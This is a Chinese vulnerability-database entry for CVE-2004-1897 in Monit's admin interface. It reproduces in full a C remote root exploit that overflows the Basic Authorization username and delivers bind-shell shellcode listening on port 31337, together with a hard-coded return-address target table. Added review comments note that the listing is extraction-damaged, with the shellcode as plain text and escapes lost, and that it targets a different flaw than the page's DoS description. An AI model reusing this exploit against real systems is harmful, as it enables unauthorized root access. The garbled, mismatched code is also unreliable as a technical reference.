多个Monit管理员接口远程漏洞

多个Monit管理员接口远程漏洞

漏洞ID 1107872 漏洞类型 未知
发布时间 2004-04-12 更新时间 2005-10-20
CVE编号 CVE-2004-1897
CNNVD-ID CNNVD-200412-868
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/174
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-868
|漏洞详情
Monit 1.4 至 4.2 的管理员接口存在漏洞。远程攻击者可以通过发送不带密码的基本认证请求导致拒绝服务(段错误):该请求使 Monit 解引用空指针并引起越界读取。
|漏洞EXP
/*
 * THE EYE ON SECURITY RESEARCH GROUP - INDIA
 *
 * www eos-india net poc 305monit.c
 * Remote Root Exploit for Monit <= 4.2
 * Vulnerability: Buffer overflow in handling of Basic Authentication information.
 * Server authenticates clients through:
 * Authentication: Basic Base64Encode[UserName:Password]
 * Here we are exploiting the insecure handling of username in Basic Authentication information to return
 * control (EIP) to our payload.
 *
 * Nilanjan De [n2n linuxmail org] - Abhisek Datta [abhisek front ru]
 *
 * 06.04.2004
 * www eos-india net
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>

#define 	BUFF_SIZE	2048
#define		PADDING		40
#define		EXP_SIZE	(256+4+PADDING)
#define MAX_ARCH 2
/*
 * Target table: one entry per supported build plus a NULL-arch sentinel that
 * show_help() stops on. MAX_ARCH (2) counts only the real entries and is the
 * bound main() checks the index against.
 *
 * The initializer is brace-elided: each consecutive string/number pair fills
 * one struct eos. Per the header comment, ret is the value the payload tries
 * to return control to; the first entry is a hard-coded address for one
 * specific Gentoo build and is unverified here, the second is a deliberately
 * invalid value whose entry name says it only crashes the service.
 *
 * NOTE(review): the page's own description (CVE-2004-1897) is a null-pointer
 * dereference DoS triggered by a password-less Basic auth request, whereas
 * this listing goes after an overflow in the Basic auth username — apparently
 * a different issue from the same "multiple vulnerabilities" advisory; treat
 * the two as separate findings when mapping detections or patches.
 */
struct eos{
	char *arch;          /* human-readable name shown in the help listing */
	unsigned long ret;   /* copied 4 bytes at a time by make_http_request(), i.e. a 32-bit value */
} targets[] = {
	"Monit-4.2-Gentoo",
	0xbf7fef02,
	//-------------------------------
	"Monit <=4.2 Crash",
	0xbadc0ded,          /* crash-only target, see its name */
	NULL,                /* sentinel: end of table for show_help() */
	0
};
/*
 x86 linux portbind a shell in port 31337
 based on shellcode from www.shellcode.com.ar
 with a few modifications by us
*/
 
/*
 * Payload placed at offset 256 of the scratch buffer by make_http_request().
 * The trailing comment on each line is the authors' own disassembly and is the
 * only description of intent this file gives; read top to bottom it says:
 * fork, exit in one branch, setuid(0), socket/bind/listen/accept on TCP port
 * 31337, dup2 the accepted socket over descriptors 0..2, then execve a shell.
 *
 * NOTE(review): as reproduced on this page the literals read "x31xc0" rather
 * than hex escapes, so this array holds plain ASCII text, not the bytes the
 * comments describe — the listing is an extraction-damaged copy.
 *
 * Defender's view: the observable behaviour described above — the monit
 * process forking and opening an unexpected listener on 31337, followed by a
 * shell spawned from that process — is what host-based monitoring of this
 * exploit family keys on; the request itself is a single GET with an oversized
 * Basic Authorization header (see make_http_request()).
 */
char shellcode[]=
        /* sys_fork() */
	"x31xc0"                      // xorl         %eax,%eax
	"x31xdb"                      // xorl         %ebx,%ebx
	"xb0x02"                      // movb         $0x2,%al
	"xcdx80"                      // int          $0x80
	"x38xc3"                      // cmpl         %ebx,%eax
	"x74x05"                      // je           0x5
	/* sys_exit() */
	"x8dx43x01"                  // leal         0x1(%ebx),%eax
	"xcdx80"                      // int          $0x80
        /* setuid(0) */
        "x31xc0"                      // xorl         %eax,%eax
        "x31xdb"                      // xorl         %ebx,%ebx
        "xb0x17"                      // movb         $0x17,%al
        "xcdx80"                      // int          $0x80
        /* socket() */
        "x31xc0"                      // xorl    %eax,%eax
        "x89x45x10"                  // movl    %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
        "x40"                          // incl    %eax
        "x89xc3"                      // movl    %eax,%ebx(SYS_SOCKET = 0x1)
        "x89x45x0c"                  // movl    %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
        "x40"                          // incl    %eax
        "x89x45x08"                  // movl    %eax,0x8(%ebp)(AF_INET = 0x2)
	"x8dx4dx08"                  // leal    0x8(%ebp),%ecx
        "xb0x66"                      // movb    $0x66,%al
        "xcdx80"                      // int     $0x80
        "x89x45x08"                  // movl    %eax,0x8(%ebp)

        /* bind()*/
        "x43"                          // incl    %ebx(SYS_BIND = 0x2)
        "x66x89x5dx14"              // movw    %bx,0x14(%ebp)(AF_INET = 0x2)
	"x66xc7x45x16x7ax69"      // movw    $0x697a,0x16(%ebp)(port=31337)
        "x31xd2"                      // xorl    %edx,%edx
        "x89x55x18"                  // movl    %edx,0x18(%ebp)
        "x8dx55x14"                  // leal    0x14(%ebp),%edx
        "x89x55x0c"                  // movl    %edx,0xc(%ebp)
        "xc6x45x10x10"              // movb    $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
        "xb0x66"                      // movb    $0x66,%al
        "xcdx80"                      // int     $0x80
 
        /* listen() */
        "x40"                          // incl    %eax
        "x89x45x0c"                  // movl    %eax,0xc(%ebp)
        "x43"                          // incl    %ebx
        "x43"                          // incl    %ebx(SYS_LISTEN = 0x4)
        "xb0x66"                      // movb    $0x66,%al
        "xcdx80"                      // int     $0x80
 
        /* accept() */
        "x43"                          // incl    %ebx
        "x89x45x0c"                  // movl    %eax,0xc(%ebp)
        "x89x45x10"                  // movl    %eax,0x10(%ebp)
        "xb0x66"                      // movb    $0x66,%al
        "xcdx80"                      // int     $0x80
        "x89xc3"                      // movl    %eax,%ebx
 
        /* dup2() */
        "x31xc9"                      // xorl    %ecx,%ecx
        "xb0x3f"                      // movb    $0x3f,%al
        "xcdx80"                      // int     $0x80
        "x41"                          // incl    %ecx
        "x80xf9x03"                  // cmpb    $0x3,%cl
        "x75xf6"                      // jne     -0xa
 
        /* execve() */
        "x31xd2"                      // xorl    %edx,%edx
        "x52"                          // pushl   %edx
        "x68x6ex2fx73x68"          // pushl   $0x68732f6e
        "x68x2fx2fx62x69"          // pushl   $0x69622f2f
        "x89xe3"                      // movl    %esp,%ebx
        "x52"                          // pushl   %edx
        "x53"                          // pushl   %ebx
        "x89xe1"                      // movl    %esp,%ecx
        "xb0x0b"                      // movb    $0xb,%al
        "xcdx80";                     // int     $0x80

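/*
 * Print the banner and, when opt is non-zero, the usage line and the target
 * table (every entry of targets[] up to the NULL sentinel).
 *
 * pr00gie: argv[0], echoed in the usage line.
 * opt:     0 = banner only, non-zero = banner + usage + target list.
 *
 * The banner literals are reproduced as found: the escape sequences in them
 * lost their backslashes when the listing was extracted, so "n" prints as a
 * letter rather than a newline.
 */
void show_help(char *pr00gie,u_short opt) {
	printf("==========> THE EYE ON SECURITY RESEARCH GROUP <==========n");
	printf("Monit <= 4.2 Remote Root Exploitn");
	printf("n2n[at]linuxmail[dot]org - abhisek[at]front[dot]run");
	printf("http://www.eos-india.netnn");
	if(!opt)
		return;
	printf("[usage]n");
	printf("%s [Remote Host] [Remote Port] [Target]n",pr00gie);
	printf("[Available Targets]n");
	/* ret is an unsigned long, so it is printed with %#lx: the original passed
	 * it to %p, a format/argument mismatch (undefined behaviour) that merely
	 * happened to print the same "0x..." text on 32-bit builds. */
	for (int i = 0; targets[i].arch != NULL; i++)
		printf("%d. - %st - %#lxn", i, targets[i].arch, targets[i].ret);
}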
/* Base 64 code ripped from monit src */
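/**
 * Base64 encode one 6-bit value (0..63) to its alphabet character.
 * Values above 63 fall through to '/', as in the original helper.
 */
static char encode(unsigned char u) {

  if(u < 26)  return 'A'+u;
  if(u < 52)  return 'a'+(u-26);
  if(u < 62)  return '0'+(u-52);
  if(u == 62) return '+';

  return '/';

}
/**
 * Base64 encode 'size' bytes of 'src' and return a NUL-terminated,
 * '='-padded string. The caller must free the returned string.
 * @param size The number of bytes in src; 0 means "use strlen(src)"
 * @param src The data to be base64 encoded
 * @return encoded string, or NULL if src is NULL, size is negative, or
 *         allocation fails
 */
char *encode_base64(int size, unsigned char *src) {

  if(!src)
    return NULL;

  if(!size)
    size= strlen((char *)src);

  /* A negative size used to flow into the allocation arithmetic as a huge
   * size_t; reject it explicitly instead. */
  if(size < 0)
    return NULL;

  /* Every 3 input bytes become 4 output characters; +4 covers the final
   * partial group and the terminator. */
  size_t cap= (size_t)size*4/3+4;
  char *out= malloc(cap);
  if(!out)
    return NULL;   /* the original wrote through a NULL p on allocation failure */

  char *p= out;
  for(int i=0; i<size; i+=3) {
    unsigned char b1= src[i];
    unsigned char b2= (i+1<size) ? src[i+1] : 0;
    unsigned char b3= (i+2<size) ? src[i+2] : 0;

    *p++= encode(b1>>2);
    *p++= encode(((b1&0x3)<<4)|(b2>>4));
    /* Missing trailing input bytes are signalled with '=' padding. */
    *p++= (i+1<size) ? encode(((b2&0xf)<<2)|(b3>>6)) : '=';
    *p++= (i+2<size) ? encode(b3&0x3f) : '=';
  }

  /* The original never terminated the buffer, so callers that treated the
   * result as a C string (make_http_request() prints it with "%s") read past
   * the allocation. */
  *p= '\0';

  return out;

}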


/*
 * Build the HTTP request that carries the payload into buff (size bytes).
 *
 * buff:  caller-supplied output buffer, zeroed here first
 * size:  capacity of buff
 * host:  value for the Host header
 * magic: value copied, 4 bytes at a time, over the tail of the scratch buffer
 *        (the ret field of the chosen targets[] entry)
 *
 * The EXP_SIZE-byte scratch buffer is filled with 0x90, the shellcode is
 * copied so that it ends at offset 256, *magic is repeated from 256 up to
 * EXP_SIZE-5, and ":x" closes it — presumably so the decoded value still has
 * the "user:password" shape the header comment says Basic auth expects. The
 * whole buffer is base64-encoded and sent as the Authorization header.
 *
 * NOTE(review): the request literals ("rn") lost their backslash escapes in
 * extraction and are reproduced as found.
 */
void make_http_request(char *buff,int size,char *host,unsigned long *magic) {
	char *exp_buff;
	char *exp_buff_encoded;
	int i;
	/* malloc/exit/memset/strcpy/strlen are used without <stdlib.h>/<string.h>,
	 * which this file never includes. */
	if (!(exp_buff=(char*)malloc(EXP_SIZE))){
		perror("malloc()");
		exit(1);
	}
	
	memset(exp_buff,0x90,EXP_SIZE);
	/* Relies on strlen(shellcode) <= 256; there is no check, and a longer
	 * payload would write before the start of exp_buff. */
	strcpy(exp_buff+256-strlen(shellcode),shellcode);
	/* Copying exactly 4 bytes of *magic assumes a 32-bit unsigned long. */
	for(i=256;i<EXP_SIZE-5;i+=4)
		memcpy(exp_buff+i,magic,4);
	strcpy(exp_buff+EXP_SIZE-4,":x");
	/* encode_base64() returns NULL when its allocation fails and, as written
	 * on this page, does not NUL-terminate its result; it is used unchecked
	 * below with "%s". */
	exp_buff_encoded=encode_base64(EXP_SIZE,exp_buff);	
	memset(buff,0x00,size);
	/* sprintf(buff, "%s...", buff, ...) passes the destination as a source:
	 * overlapping objects, undefined behaviour (C11 7.21.6.6p2). Appending
	 * with snprintf(buff + strlen(buff), size - strlen(buff), ...) is the
	 * bounded, non-overlapping form. None of these writes checks size. */
	sprintf(buff,"GET / HTTP/1.0rn");
	sprintf(buff,"%sHost: %srn",buff,host);
	sprintf(buff,"%sAuthorization: Basic %srnrnrn",buff,exp_buff_encoded);
	/* exp_buff and exp_buff_encoded are never freed. */
	
}
/*
 * Entry point: <host> <port> <target index>. Resolves the host, connects over
 * TCP, sends the request built by make_http_request() once, and exits.
 * Returns 0 after the send attempt regardless of its outcome; exits with
 * status 1 on usage, resolution, allocation, socket or connect failure.
 *
 * Output literals are reproduced as found: their "n"/"t" escapes lost the
 * backslash in extraction.
 *
 * Defender's view: on the wire this is one plain-HTTP GET whose Basic
 * Authorization value is roughly 400 base64 characters (EXP_SIZE = 300 bytes
 * encoded), far longer than any real credential; a length check on that
 * header is the simplest network-side detection for this exploit family.
 */
int main(int argc,char *argv[]) {
	char *host;
	char *b;
	int rport;
	int sockfd;
	struct sockaddr_in sin;   /* declared in <netinet/in.h>, reached here only via <netdb.h> */
	struct hostent *h;
	unsigned int n;
	unsigned long magic;
	if(argc != 4) {
		show_help(argv[0],1);
		exit(1);
	}
	host=argv[1];
	/* atoi() reports no errors: a non-numeric port or index silently becomes 0. */
	rport=(atoi(argv[2]));
	n=atoi(argv[3]);
	/* n is unsigned, so n<0 is always false (dead check); a negative argument
	 * wraps to a large value and is rejected by the >= MAX_ARCH test instead. */
	if((n >= MAX_ARCH)||(n<0)) {
		printf("- Invalid targetn");
		show_help(argv[0],1);
		exit(1);
		}
	magic=targets[n].ret;
	show_help(argv[0],0);
	/* %p with an unsigned long argument is a format mismatch; %#lx is the
	 * matching conversion. */
	printf("-Using RET %pn",magic);
	printf("Resolving %st",host);
	h=gethostbyname(host);
	if(!h) {
		printf("[ERROR]nUnable to resolve: %sn",host);
		exit(1);
	}
	else
	printf("[DONE]n");
	b=(char*)malloc(BUFF_SIZE);
	if(!b) {
		perror("malloc");
		exit(1);
	}
	/* h_addr is the legacy alias of h_addr_list[0]; only the first address is used. */
	sin.sin_addr=*((struct in_addr*)h->h_addr);
	sin.sin_family=AF_INET;
	sin.sin_port=htons((u_short)rport);
	if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
		perror("socket");
		exit(1);
	}
	printf("Connecting to %s:%dt",host,rport);
	if(connect(sockfd,(struct sockaddr*)&sin,sizeof(sin))<0) {
		printf("[ERROR]nUnable to connect: %s:%dn",host,rport);
		perror("connect");
		exit(1);
	}
	else
	printf("[DONE]n");
	make_http_request(b,BUFF_SIZE,host,&magic);
	/* send() returns ssize_t, strlen() size_t: the comparison is done unsigned,
	 * so -1 becomes SIZE_MAX and is reported as "Failed" only because it is
	 * unequal to the length. A short send is likewise not retried. */
	if(send(sockfd,b,strlen(b),0) == strlen(b))
		printf("Successfully send exploit stringn");
	else
		printf("Failed sending exploit stringn");
	close(sockfd);
	/* b is never freed; the process exits right away, so no practical leak. */
	return 0;
}




// milw0rm.com [2004-04-12]
|参考资料

来源:BID
名称:10051
链接:http://www.securityfocus.com/bid/10051
来源:SECUNIA
名称:11304
链接:http://secunia.com/advisories/11304
来源:BUGTRAQ
名称:20040405 Advisory: Multiple Vulnerabilities in Monit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108119149103696&w=2
来源:XF
名称:monit-basic-auth-dos(15734)
链接:http://xforce.iss.net/xforce/xfdb/15734
